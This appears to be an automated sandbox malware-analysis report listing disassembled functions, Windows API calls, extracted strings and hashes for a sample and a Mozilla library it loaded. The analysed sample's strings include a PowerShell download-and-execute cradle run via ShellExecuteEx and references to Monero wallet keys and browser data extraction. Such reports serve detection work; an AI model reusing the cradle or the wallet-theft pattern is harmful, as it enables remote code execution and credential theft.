Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CBCF480

Part of subcall function 6CB9F100: LoadLibraryW.KERNEL32(shell32,?,6CC0D020), ref: 6CB9F122
Part of subcall function 6CB9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CB9F132

CloseHandle.KERNEL32(00000000), ref: 6CBCF555

Part of subcall function 6CBA14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CBA1248,6CBA1248,?), ref: 6CBA14C9
Part of subcall function 6CBA14B0: memcpy.VCRUNTIME140(?,6CBA1248,00000000,?,6CBA1248,?), ref: 6CBA14EF

Part of subcall function 6CB9EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CB9EEE3

CreateFileW.KERNEL32 ref: 6CBCF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CBCF523

Strings

\oleacc.dll, xrefs: 6CBCF4CB

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 45fbac77b5217c3a9d67f207c05f90e94ef9cf3262d5d123a86f369583560779
Instruction ID: b49c6ecf31b3820b211d1832dc59913581a25f2b81c029b106a4ac0ec6c7b607
Opcode Fuzzy Hash: 45fbac77b5217c3a9d67f207c05f90e94ef9cf3262d5d123a86f369583560779
Instruction Fuzzy Hash: 4A419D707087909FE720DF69C885A9AB7F4EF85318F104A5CF6A483650EB30D94A8B93

Function 00772C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

ShellExecuteEx.SHELL32(0000003C), ref: 00772D85

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00772CC4
')", xrefs: 00772CB3
<, xrefs: 00772D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00772D04

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: a6430443fba0abc5bada7567ee11ac15557af7b8e6d1b82e609b6886ba202a36
Instruction ID: 5927dfdc8c5929a7817937e0b76cf520248edf9dc7cb292bd2a05c4d2ef66782
Opcode Fuzzy Hash: a6430443fba0abc5bada7567ee11ac15557af7b8e6d1b82e609b6886ba202a36
Instruction Fuzzy Hash: 7541D071D10208EAEF55FFA0C899FDEB774AF50340F408129F11AA6191DF786A4ACF92

Function 6CBF74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CBF7526
__Init_thread_footer.LIBCMT ref: 6CBF7566
__Init_thread_footer.LIBCMT ref: 6CBF7597

Strings

kernel32.dll, xrefs: 6CBF7557
UnmapViewOfFile2, xrefs: 6CBF7552

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 21d935e602cfe3543b61713ba470d0d5f6ccfa67213c62388be220849710aae4
Instruction ID: 4eb73c370266f6495e5a8e40b5eee39566ecb3d24db75aa7ba5b4f0edf1443ef
Opcode Fuzzy Hash: 21d935e602cfe3543b61713ba470d0d5f6ccfa67213c62388be220849710aae4
Instruction Fuzzy Hash: D6213431704581AFCB15CFEAC815E8D3376FB46324F0041ADE815A7F40DBB0A80B8AD6

Function 6CBFC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CBFC0E9), ref: 6CBFC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CBFC437
FreeLibrary.KERNEL32(?,6CBFC0E9), ref: 6CBFC44C

Strings

ntdll.dll, xrefs: 6CBFC413
NtQueryVirtualMemory, xrefs: 6CBFC431

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: bce8b84d6fffd065acc16d492819b391e340269e5a9d6c0f61e78c085b2abc75
Instruction ID: 7b197ee493154da91860894527187bc7950ad0061e87f6e19755c1e01f4af3b7
Opcode Fuzzy Hash: bce8b84d6fffd065acc16d492819b391e340269e5a9d6c0f61e78c085b2abc75
Instruction Fuzzy Hash: 65E0B6B46053019FEF00BF77C91A7117BF8BB07308F005616EA0892F50EBB1C8568B51

Function 6CBF75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CBF748B,?), ref: 6CBF75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CBF75D7
FreeLibrary.KERNEL32(?,6CBF748B,?), ref: 6CBF75EC

Strings

RtlNtStatusToDosError, xrefs: 6CBF75D1
ntdll.dll, xrefs: 6CBF75B3

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 563b07a8c22c0478dd3d1cf3f3968c90b742463805cf776084efa40d6eaa02ff
Instruction ID: ea51511bd19b781fb854f8e5f6fcde52b854980d470a3df4921caa046efc8135
Opcode Fuzzy Hash: 563b07a8c22c0478dd3d1cf3f3968c90b742463805cf776084efa40d6eaa02ff
Instruction Fuzzy Hash: 84E092B1604342AFEB01ABA3D85A7017AF8FB06218F108025A905D1F50EBF488968F91

Function 00769E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00769F41

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Strings

@, xrefs: 00769EF1
ERROR_RUN_EXTRACTOR, xrefs: 00769E67
v10, xrefs: 00769EA3
v20, xrefs: 00769E21

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: a18c4dbdbb3a6a488636777dcd7b7ea9356b209a9e382fa58337388e4015f632
Instruction ID: 6f159df66ceb91f66f5419fb693db6dd9b164b7d75672cc14ce8cc39fdd21501
Opcode Fuzzy Hash: a18c4dbdbb3a6a488636777dcd7b7ea9356b209a9e382fa58337388e4015f632
Instruction Fuzzy Hash: DF612271A50248EFDF18EFA4CC99FED7775AF84344F408118F90A5B191EB786A05CB92

Function 6CB94DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB94E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CB94E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB94EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB94F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CB94F1E

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 43ce737d9044a4ec3bffbd233268c285910e53c0c2e0deaedd979cc9ed09198a
Instruction ID: cceae6ad06082ad60af665d79958d893c2171b4883e28c102349e98dc321d7ce
Opcode Fuzzy Hash: 43ce737d9044a4ec3bffbd233268c285910e53c0c2e0deaedd979cc9ed09198a
Instruction Fuzzy Hash: B241D371604B469FC705CF29C480A5BB7E4FF8A344F108A2DF56A87B41D730E958CB92

Function 6CBA1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6CBA152B,?,?,?,?,6CBA1248,?), ref: 6CBA159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6CBA152B,?,?,?,?,6CBA1248,?), ref: 6CBA15BC
moz_xmalloc.MOZGLUE(-00000001,?,6CBA152B,?,?,?,?,6CBA1248,?), ref: 6CBA15E7
free.MOZGLUE(?,?,?,?,?,?,6CBA152B,?,?,?,?,6CBA1248,?), ref: 6CBA1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CBA152B,?,?,?,?,6CBA1248,?), ref: 6CBA1637

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60ed4e220e60ba3734f6775566fb55530d51530f4b503a45d25de64c369c3a5d
Instruction ID: 2ebba16b0fec364b4ab059fd110342dab28070a28b189fa5a8614905a94270bf
Opcode Fuzzy Hash: 60ed4e220e60ba3734f6775566fb55530d51530f4b503a45d25de64c369c3a5d
Instruction Fuzzy Hash: CE31F871A08154CBC7588EBCD85056E73A9FB8536472C0B2DE463DBBE4EB30D9068792

Function 6CB9B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CB9B532
moz_xmalloc.MOZGLUE(?), ref: 6CB9B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB9B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CB9B57E
free.MOZGLUE(00000000), ref: 6CB9B58F

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: ca6a52822a038db83a2f2252c3358441f6c98a065fc9a0905e8c11f0330d9100
Instruction ID: 37714ce2abdd700dce1f5513c9601bd6cd94e2f67aa6996b7664d07ab81cf861
Opcode Fuzzy Hash: ca6a52822a038db83a2f2252c3358441f6c98a065fc9a0905e8c11f0330d9100
Instruction Fuzzy Hash: 4821F371A002459BDB108F69CC51BAEBBBAFF86314F284039E818DB341E736DD11C7A1

Function 00779260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0125E0F8,?,?,?,0077140C,?,0125E0F8,00000000), ref: 0077926C
lstrcpyn.KERNEL32(009AAB88,0125E0F8,0125E0F8,?,0077140C,?,0125E0F8), ref: 00779290
lstrlen.KERNEL32(?,?,0077140C,?,0125E0F8), ref: 007792A7
wsprintfA.USER32 ref: 007792C7

Strings

%s%s, xrefs: 007792B5

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 673cbd2da091ac43c1a65da7be33d7fd94f848d98fb600955d19d19693ee3108
Instruction ID: ba2675cfcdf18f8deaca61a0084250fedcefaf38f5fab7d883855b0ef61c191f
Opcode Fuzzy Hash: 673cbd2da091ac43c1a65da7be33d7fd94f848d98fb600955d19d19693ee3108
Instruction Fuzzy Hash: 31019075904208FFCB04DFA8C988EAE7BB9EF49364F108148F9099B205C735AA50DBE1

Function 6CBBD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6CBCCBE8: GetCurrentProcess.KERNEL32(?,6CB931A7), ref: 6CBCCBF1
Part of subcall function 6CBCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB931A7), ref: 6CBCCBFA

EnterCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD4F2
LeaveCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD50B

Part of subcall function 6CB9CFE0: EnterCriticalSection.KERNEL32(6CC1E784), ref: 6CB9CFF6
Part of subcall function 6CB9CFE0: LeaveCriticalSection.KERNEL32(6CC1E784), ref: 6CB9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD52E
EnterCriticalSection.KERNEL32(6CC1E7DC), ref: 6CBBD690
LeaveCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD751

Strings

MOZ_CRASH(), xrefs: 6CBBD4BB

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 516c85cba72fe79a05d0231c24f6aba7e8d3c3516a2ec4fb315bac56f90aed09
Instruction ID: 3eb60912da47fc73279720e8c4b6d3c5c991c0735df5b87992aed4c03c0d65ac
Opcode Fuzzy Hash: 516c85cba72fe79a05d0231c24f6aba7e8d3c3516a2ec4fb315bac56f90aed09
Instruction Fuzzy Hash: 2B51C171A047858FE314CF69C19476AB7F1FB8A314F14492ED59AD7F88EB74A800CB92

Function 0077C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 0077C8EC
___crtLCMapStringA.LIBCMT ref: 0077C90C
___crtLCMapStringA.LIBCMT ref: 0077C931

Strings

, xrefs: 0077C896

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
